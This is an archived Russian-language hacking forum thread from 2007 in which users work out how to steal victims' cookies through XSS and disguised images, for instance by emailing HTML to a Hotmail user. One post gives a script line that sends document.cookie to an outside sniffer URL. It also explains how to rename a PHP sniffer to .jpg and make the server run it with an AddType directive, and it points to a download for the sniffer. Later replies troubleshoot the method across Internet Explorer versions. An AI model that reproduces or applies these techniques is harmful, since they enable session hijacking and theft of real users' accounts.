PDA

Просмотр полной версии : Cookie через рисунки

Muhacir
17.03.2007, 12:39
Слыхал можно cookie красть через рисунки на активных хсс.
у кого есть идеии
Srg
17.03.2007, 13:01
:) Товарисчь, картинки - это не в прямом смысле, ты имеешь в виду файлы с расширением jpg которые интерпретируються сервером как php скрипт...

Таким образом - AddType application/x-httpd-php .jpg
Muhacir
17.03.2007, 13:08
нет например жертве маил в хтмл формате отправим, с рисунками. а в рисунках xss на наш сниффер
Srg
17.03.2007, 13:18
Ты имеешь ввиду вот это?

Примеры использования сниффера:
Простой вызов по ссылке:
<a href="http://antichat.ru/cgi-bin/s.jpg?it is test">click me</a>
Вызов как картинки:
<img src="http://antichat.ru/cgi-bin/s.jpg">
Вызов из скрипта:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

(с) old.antichat.ru

А эта "картинка" является собой пхп кодом, выполняющимся на сервере и сохраняющая кукисы жертвы
Muhacir
17.03.2007, 13:55
2 ой варриант
но как закапывать коды в рисунок.
например я хочу отправить писмо по хотмаил и когда он откроет писмо куки шли на мой сниффер
Srg
17.03.2007, 14:10
Для начала создаешь файл s.php в него пишешь код снифера, затем переименовываешь в s.jpg

Скачать снифер можно с http://kanick.ru, полазий по архиву и разберешься
DimOnOID
17.03.2007, 14:45
статейка про это ... тут (http://www.securitylab.ru/contest/291564.php)
George767
13.07.2007, 10:50
.....
C!klodoL
13.07.2007, 10:54
у тебя internet explorer 7, а видимо надо 6 чтобы работало
DeBugger
13.07.2007, 11:13
Если у кого старая версия, плиз откройте этот файлик через нее http://anopov.com/files/ntf/scr/hex/1.png
Мой IE7 открыл эту ссылку как текст такого содержания: ‰PNG  IHDRђwSЮ pHYs  љњgAMA±Ћ|ыQ“ cHRMz%ЂѓщяЂйu0к`:?o’_ЕFIDATxЪbf``0 уЯiIEND®B`‚
George767
13.07.2007, 11:13
у тебя internet explorer 7, а видимо надо 6 чтобы работало

Точняк! Я только что вспомнил что у меня на ноутбуке старая версия Ie и реально пашет! Спасибо!
censored!
13.07.2007, 13:11
http://forum.antichat.ru/thread6137.html
http://forum.antichat.ru/thread9910.html
kalpsik
08.08.2007, 17:52
хз.. но если картинку закинуть на любой веб-сервер и открывать оттуда то работает тема на любый версиях Ie. тестил на 5,6 и 7....
mad_xakep
09.09.2007, 17:30
почему сделал такую картинку! пробовал вместо аватарки и на форуме картикой впихнуть полчучилось, но куки неидут мне. а хотя когда я положил картинку на хост открыл мне пришел ип но без кук само сабой, а когда картинка на форуме лежит ваще ниче неидет!
XenOtai
17.09.2007, 18:38
Необходимо, чтобы юзер заходил на твою картинку напрямую.